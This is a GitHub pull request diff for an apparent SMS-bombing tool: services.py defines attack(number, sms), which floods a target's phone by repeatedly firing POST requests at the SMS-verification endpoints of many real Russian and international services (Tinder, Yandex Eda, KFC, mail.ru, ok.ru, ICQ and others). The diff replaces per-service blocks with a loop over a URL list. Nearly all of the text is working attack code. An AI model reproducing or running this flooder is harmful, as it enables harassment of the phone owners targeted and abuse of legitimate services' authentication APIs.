Skip to content
This repository has been archived by the owner on Nov 24, 2024. It is now read-only.

Some commands became more concise #10

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
137 changes: 10 additions & 127 deletions services.py
Original file line number Diff line number Diff line change
Expand Up @@ -68,130 +68,13 @@ def attack(number, sms):
print("-" * 33)
HEADERS = random.choice(heads)
while sent <= sms:
try:
requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': number_7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code",json = {"phone": number_7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://cloud.mail.ru/api/v2/notify/applink',json = {"phone": number_plus7, "api": 2, "email": "email","x-email": "x-email"}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': number_plus7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://b.utair.ru/api/v1/login/', data = {'login':number_8}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data = {"phone_number":number_7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://www.citilink.ru/registration/confirm/phone/+'+ number_7 +'/', headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post("https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone", data = {"st.r.phone": number_plus7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://app.karusel.ru/api/v1/phone/', data = {"phone":number_7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://youdrive.today/login/web/phone', data = {'phone': number, 'phone_code': '7'},headers=HEADERS) #headers = {}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://api.mtstv.ru/v1/users', json={'msisdn': number_7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://youla.ru/web-api/auth/request_code', json = {"phone":number_plus7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://eda.yandex/api/v1/user/request_authentication_code',json={"phone_number": "+" + number_7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post("https://api.ivi.ru/mobileapi/user/register/phone/v6", data= {"phone": number_7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post("https://api.delitime.ru/api/v2/signup",data={"SignupForm[username]": number_7, "SignupForm[device_type]": 3}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass

try:
requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php',data={'msisdn': number_7, "locale": 'en', 'countryCode': 'ru','version': '1', "k": "ic1rtwz1s1Hj1O0r", "r": "46763"}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass
# send request to all APIs for sending sms
APIs = ['https://b.utair.ru/api/v1/login/', 'https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', 'https://www.citilink.ru/registration/confirm/phone/+', 'https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', 'https://app.karusel.ru/api/v1/phone/', 'https://youdrive.today/login/web/phone', 'https://api.mtstv.ru/v1/users', 'https://youla.ru/web-api/auth/request_code', 'https://eda.yandex/api/v1/user/request_authentication_code', 'https://api.ivi.ru/mobileapi/user/register/phone/v6', 'https://api.delitime.ru/api/v2/signup', 'https://www.icq.com/smsreg/requestPhoneValidation.php', 'https://api.sunlight.net/v3/customers/authorization/', 'https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', 'https://cloud.mail.ru/api/v2/notify/applink', 'https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms']
for API in APIs:
try:
requests.post(API, data={'phone': number_7}, headers=HEADERS)
sent += 1
time(sent)
check(sent,sms)
except:
pass